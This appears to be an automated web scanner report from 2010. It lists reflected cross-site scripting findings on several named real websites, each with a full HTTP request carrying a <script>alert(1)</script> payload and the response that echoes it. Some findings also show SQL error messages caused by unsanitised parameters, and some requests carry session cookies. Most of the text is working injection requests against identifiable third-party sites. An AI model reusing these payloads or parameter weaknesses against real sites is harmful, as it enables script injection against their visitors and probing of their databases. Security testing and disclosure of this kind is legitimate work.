The value of the %20Services&categoryId request parameter is copied into the HTML document as plain text between tags. The payload c8d81<a>31fea90d260 was submitted in the %20Services&categoryId parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /directory.php?name=Business%20&%20Services&categoryId=167c8d81<a>31fea90d260 HTTP/1.1 Host: www.montrealkiosk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=181040571.1290654039.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=181040571.1113724292.1290654039.1290654039.1290654039.1; __utmc=181040571; __utmb=181040571;
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 03:09:38 GMT Server: Apache/1.3.37 (Unix) PHP/5.2.0 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.0 Connection: close Content-Type: text/html Content-Length: 1342
mysql error: [1054: Unknown column '167c8d81' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 167c8d81<a>31fea90d260 ORDER BY name ASC") <pre align=left> &nb ...[SNIP]...
The value of the categoryId request parameter is copied into the HTML document as plain text between tags. The payload c3cc1<a>86876869d34 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /directory.php?categoryId=228c3cc1<a>86876869d34 HTTP/1.1 Host: www.montrealkiosk.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
mysql error: [1054: Unknown column '228c3cc1' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 228c3cc1<a>86876869d34 ORDER BY name ASC") <pre align=left> &nb ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 108be'%3b09a4592ac0c was submitted in the REST URL parameter 1. This input was echoed as 108be';09a4592ac0c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /x22108be'%3b09a4592ac0c HTTP/1.1 Host: www.nationalpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Thu, 25 Nov 2010 02:26:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 25 Nov 2010 02:26:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39030
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68320<script>alert(1)</script>a521c5ddfe9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js68320<script>alert(1)</script>a521c5ddfe9/trackerCode.js HTTP/1.1 Host: www.refcodeanalytics.com Proxy-Connection: keep-alive Referer: http://www.mastermindsolutions.ca/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <body> <h1> ...[SNIP]... <p> The Requested URL /js68320<script>alert(1)</script>a521c5ddfe9/trackerCode.js was not found on this server. </p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 873a7<script>alert(1)</script>56fef20bccc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/trackerCode.js873a7<script>alert(1)</script>56fef20bccc HTTP/1.1 Host: www.refcodeanalytics.com Proxy-Connection: keep-alive Referer: http://www.mastermindsolutions.ca/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <body> <h1> ...[SNIP]... <p> The Requested URL /js/trackerCode.js873a7<script>alert(1)</script>56fef20bccc was not found on this server. </p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e4416<script>alert(1)</script>a994d40b830 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /processe4416<script>alert(1)</script>a994d40b830/backend1.php?track=null&ua=Mozilla%2F5.0%2520%2528Windows%253B%2520U%253B%2520Windows%2520NT%25206.1%253B%2520en-US%2529%2520AppleWebKit%2F534.7%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome%2F7.0.517.44%2520Safari%2F534.7&client=164C27DC&url=http%253A%2F%2Fwww.mastermindsolutions.ca%2F&ref=&time=null&thisTime=1290651412&callback=setOutput&cpuClass=undefined&systemLanguage=en-US&userLanguage=en-US&screenColors=16&screenResolution=1920x1200&flashDetect=10.1%2520r103&givenDomain=null HTTP/1.1 Host: www.refcodeanalytics.com Proxy-Connection: keep-alive Referer: http://www.mastermindsolutions.ca/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <body> <h1> ...[SNIP]... <p> The Requested URL /processe4416<script>alert(1)</script>a994d40b830/backend1.php was not found on this server. </p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae872<script>alert(1)</script>9148f977d0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /process/backend1.phpae872<script>alert(1)</script>9148f977d0b?track=null&ua=Mozilla%2F5.0%2520%2528Windows%253B%2520U%253B%2520Windows%2520NT%25206.1%253B%2520en-US%2529%2520AppleWebKit%2F534.7%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome%2F7.0.517.44%2520Safari%2F534.7&client=164C27DC&url=http%253A%2F%2Fwww.mastermindsolutions.ca%2F&ref=&time=null&thisTime=1290651412&callback=setOutput&cpuClass=undefined&systemLanguage=en-US&userLanguage=en-US&screenColors=16&screenResolution=1920x1200&flashDetect=10.1%2520r103&givenDomain=null HTTP/1.1 Host: www.refcodeanalytics.com Proxy-Connection: keep-alive Referer: http://www.mastermindsolutions.ca/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <body> <h1> ...[SNIP]... <p> The Requested URL /process/backend1.phpae872<script>alert(1)</script>9148f977d0b was not found on this server. </p> ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7000c<script>alert(1)</script>64e97b78160 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /process/backend1.php?track=null&ua=Mozilla%2F5.0%2520%2528Windows%253B%2520U%253B%2520Windows%2520NT%25206.1%253B%2520en-US%2529%2520AppleWebKit%2F534.7%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome%2F7.0.517.44%2520Safari%2F534.7&client=164C27DC&url=http%253A%2F%2Fwww.mastermindsolutions.ca%2F&ref=&time=null&thisTime=1290651412&callback=setOutput7000c<script>alert(1)</script>64e97b78160&cpuClass=undefined&systemLanguage=en-US&userLanguage=en-US&screenColors=16&screenResolution=1920x1200&flashDetect=10.1%2520r103&givenDomain=null HTTP/1.1 Host: www.refcodeanalytics.com Proxy-Connection: keep-alive Referer: http://www.mastermindsolutions.ca/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the client request parameter is copied into the HTML document as plain text between tags. The payload 1ad86<script>alert(1)</script>2c849b366ab was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /process/backend1.php?track=null&ua=Mozilla%2F5.0%2520%2528Windows%253B%2520U%253B%2520Windows%2520NT%25206.1%253B%2520en-US%2529%2520AppleWebKit%2F534.7%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome%2F7.0.517.44%2520Safari%2F534.7&client=164C27DC1ad86<script>alert(1)</script>2c849b366ab&url=http%253A%2F%2Fwww.mastermindsolutions.ca%2F&ref=&time=null&thisTime=1290651412&callback=setOutput&cpuClass=undefined&systemLanguage=en-US&userLanguage=en-US&screenColors=16&screenResolution=1920x1200&flashDetect=10.1%2520r103&givenDomain=null HTTP/1.1 Host: www.refcodeanalytics.com Proxy-Connection: keep-alive Referer: http://www.mastermindsolutions.ca/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the track request parameter is copied into the HTML document as plain text between tags. The payload b6a28<script>alert(1)</script>5c442f3a850 was submitted in the track parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /process/backend1.php?track=nullb6a28<script>alert(1)</script>5c442f3a850&ua=Mozilla%2F5.0%2520%2528Windows%253B%2520U%253B%2520Windows%2520NT%25206.1%253B%2520en-US%2529%2520AppleWebKit%2F534.7%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome%2F7.0.517.44%2520Safari%2F534.7&client=164C27DC&url=http%253A%2F%2Fwww.mastermindsolutions.ca%2F&ref=&time=null&thisTime=1290651412&callback=setOutput&cpuClass=undefined&systemLanguage=en-US&userLanguage=en-US&screenColors=16&screenResolution=1920x1200&flashDetect=10.1%2520r103&givenDomain=null HTTP/1.1 Host: www.refcodeanalytics.com Proxy-Connection: keep-alive Referer: http://www.mastermindsolutions.ca/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a45f3<script>alert(1)</script>12f79596908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Diplomaa45f3<script>alert(1)</script>12f79596908/Certificate%20Request.html HTTP/1.1 Host: www.scbt.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=202628243.1290651368.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=co9h65eod642s57d45fpt5t0b3; __utma=202628243.41631642.1290651368.1290651368.1290651368.1; __utmc=202628243; cslhVISITOR=809f524ee35d0fb63685b168333fd8aa; __utmb=202628243.1.10.1290651368;
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 02:25:49 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 15304
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <td height="30" class="heading">Diplomaa45f3<script>alert(1)</script>12f79596908/Certificate Request</td> ...[SNIP]...
The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cf3c"><script>alert(1)</script>8284f95bcc1 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /page/search?q=5cf3c"><script>alert(1)</script>8284f95bcc1 HTTP/1.1 Host: www.sqlpower.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=433399EE1147EEECC43E7EEB1C25E774; __utmz=38415228.1290651392.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=38415228.288158599.1290651392.1290651392.1290651392.1; __utmc=38415228; __utmb=38415228.1.10.1290651392;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=D4EED8A2E018106C248328ED059A1193; Path=/ Content-Type: text/html Date: Thu, 25 Nov 2010 02:25:17 GMT Connection: close
<html>
<head>
<title>Keyword Search | SQL Power Software</title> <link REL="SHORTCUT ICON" HREF="http://www.sqlpower.ca/favicon.ico">
The value of the category request parameter is copied into the HTML document as text between TITLE tags. The payload 9639f</title><script>alert(1)</script>11f918aecd6 was submitted in the category parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /page/store?category=SQL+Power+Architect9639f</title><script>alert(1)</script>11f918aecd6 HTTP/1.1 Host: www.sqlpower.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9770F541AE0C8461AFEE150479271027; __utmz=38415228.1290651392.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=38415228.288158599.1290651392.1290651392.1290651392.1; __utmc=38415228; __utmb=38415228.3.10.1290651392;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html Date: Thu, 25 Nov 2010 02:57:36 GMT Connection: close
<html>
<head>
<title>SQL Power Store: SQL Power Architect9639f</title><script>alert(1)</script>11f918aecd6 | SQL Power Software</title> <link REL="SHORTCUT ICON" HREF="http://www.sq ...[SNIP]...
The value of the category request parameter is copied into the HTML document as plain text between tags. The payload f0589<script>alert(1)</script>7e6f5a6e24 was submitted in the category parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /page/store?category=SQL+Power+Architectf0589<script>alert(1)</script>7e6f5a6e24 HTTP/1.1 Host: www.sqlpower.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=9770F541AE0C8461AFEE150479271027; __utmz=38415228.1290651392.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=38415228.288158599.1290651392.1290651392.1290651392.1; __utmc=38415228; __utmb=38415228.3.10.1290651392;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html Date: Thu, 25 Nov 2010 02:57:35 GMT Connection: close
<html>
<head>
<title>SQL Power Store: SQL Power Architectf0589<script>alert(1)</script>7e6f5a6e24 | SQL Power Software</title> <link REL="SHORTCUT ICON" HREF="http://www.sqlpower.ca ...[SNIP]... <h1 class="bigtitle">SQL Power Store: SQL Power Architectf0589<script>alert(1)</script>7e6f5a6e24</h1> ...[SNIP]...
The value of the addItem request parameter is copied into the HTML document as plain text between tags. The payload b58a3<script>alert(1)</script>638bc7cb29c was submitted in the addItem parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /page/edit_cart?addItem=architect-eb58a3<script>alert(1)</script>638bc7cb29c&signupSpecId=aeeAS1y100U HTTP/1.1 Host: www.sqlpower.ca Connection: keep-alive Referer: http://www.sqlpower.ca/page/store Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=38415228.1290651392.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=9770F541AE0C8461AFEE150479271027; __utma=38415228.288158599.1290651392.1290651392.1290651392.1; __utmc=38415228; __utmb=38415228.3.10.1290651392
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html Date: Thu, 25 Nov 2010 02:56:42 GMT Content-Length: 19026
<html>
<head>
<title>Check your selections | SQL Power Software</title> <link REL="SHORTCUT ICON" HREF="http://www.sqlpower.ca/favicon.ico">
<script type="text/javascr ...[SNIP]... <span class="error"> The item you selected (architect-eb58a3<script>alert(1)</script>638bc7cb29c) was not found in our catalogue. </span> ...[SNIP]...
The value of the l request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8c13"><script>alert(1)</script>dfe9528aba3 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /it/index.asp?t=1&s=1&l=1b8c13"><script>alert(1)</script>dfe9528aba3 HTTP/1.1 Host: www.thebans.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASPSESSIONIDCSAQACQR=BANDFDHCGEIJPKEFOHIIGNHF; __utmz=56370670.1290651356.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=56370670.1478840591.1290651356.1290651356.1290651356.1; __utmc=56370670; __utmb=56370670;
Response
HTTP/1.1 200 OK Cache-Control: private Connection: close Date: Thu, 25 Nov 2010 02:24:13 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
<html> <head> <title>IT@TheBans.com</title> <meta name="description" content="TheBans Consulting Group Inc.- your IT solution provider "> <meta name="keywords" content="IT, consulting, re ...[SNIP]... <img src="images/title_1_1_1b8c13"><script>alert(1)</script>dfe9528aba3.gif" width="400" height="42" border="0"> ...[SNIP]...
The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d617"><script>alert(1)</script>f6ada1dcc5b was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /it/index.asp?t=1&s=17d617"><script>alert(1)</script>f6ada1dcc5b HTTP/1.1 Host: www.thebans.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASPSESSIONIDCSAQACQR=BANDFDHCGEIJPKEFOHIIGNHF; __utmz=56370670.1290651356.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=56370670.1478840591.1290651356.1290651356.1290651356.1; __utmc=56370670; __utmb=56370670;
Response
HTTP/1.1 200 OK Cache-Control: private Connection: close Date: Thu, 25 Nov 2010 02:24:12 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
<html> <head> <title>IT@TheBans.com</title> <meta name="description" content="TheBans Consulting Group Inc.- your IT solution provider "> <meta name="keywords" content="IT, consulting, re ...[SNIP]... <img src="images/title_1_17d617"><script>alert(1)</script>f6ada1dcc5b_1.gif" width="400" height="42" border="0"> ...[SNIP]...
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3c02"><script>alert(1)</script>659e2aa80d2 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /it/index.asp?t=1a3c02"><script>alert(1)</script>659e2aa80d2 HTTP/1.1 Host: www.thebans.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASPSESSIONIDCSAQACQR=BANDFDHCGEIJPKEFOHIIGNHF; __utmz=56370670.1290651356.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=56370670.1478840591.1290651356.1290651356.1290651356.1; __utmc=56370670; __utmb=56370670;
Response
HTTP/1.1 200 OK Cache-Control: private Connection: close Date: Thu, 25 Nov 2010 02:24:12 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
<html> <head> <title>IT@TheBans.com</title> <meta name="description" content="TheBans Consulting Group Inc.- your IT solution provider "> <meta name="keywords" content="IT, consulting, re ...[SNIP]... <img src="images/title_1a3c02"><script>alert(1)</script>659e2aa80d2_1_1.gif" width="400" height="42" border="0"> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 86876--><script>alert(1)</script>ec5acc52963 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /accordion.htm HTTP/1.1 Host: mysite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=86876--><script>alert(1)</script>ec5acc52963
Response
HTTP/1.1 404 Not Found Date: Thu, 25 Nov 2010 03:56:15 GMT Server: .V09 Apache Filter-Revision: 1.217 Keep-Alive: timeout=999999, max=999999 Connection: Keep-Alive Content-Type: text/html Content-Length: 13276
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbbad"><script>alert(1)</script>5dfb0713bf was submitted in the Referer HTTP header. This input was echoed as dbbad\"><script>alert(1)</script>5dfb0713bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: remysharp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=dbbad"><script>alert(1)</script>5dfb0713bf
Response
HTTP/1.1 200 OK Date: Thu, 25 Nov 2010 03:57:31 GMT Server: Apache/1.3.37 (Unix) DAV/1.0.3 mod_gzip/1.3.26.1a PHP/5.2.3 Vary: * X-Powered-By: PHP/5.2.3 X-Pingback: http://remysharp.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22637
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head profile="htt ...[SNIP]... <img src="http://www.google-analytics.com/__utm.gif?utmwv=1&utmn=3100742909&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=http://remysharp.com&utmr=http://www.google.com/search?hl=en&q=dbbad\"><script>alert(1)</script>5dfb0713bf&utmp=/noscript&utmac=UA-1656750-1&utmcc=__utma%3D32572930.1273546646.1290657451.1290657451.1290657451.2%3B%2B__utmb%3D32572930%3B%2B__utmc%3D32572930%3B%2B__utmz%3D32572930.1290657451.2.2.utmccn%3D(di ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b7b6"><script>alert(1)</script>1b73a493944 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /s/731/index.aspx HTTP/1.1 Host: utoronto.imodules.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6b7b6"><script>alert(1)</script>1b73a493944
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Thu, 25 Nov 2010 03:59:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 784
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 747e6"><script>alert(1)</script>58d710c40ce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=747e6"><script>alert(1)</script>58d710c40ce
Response
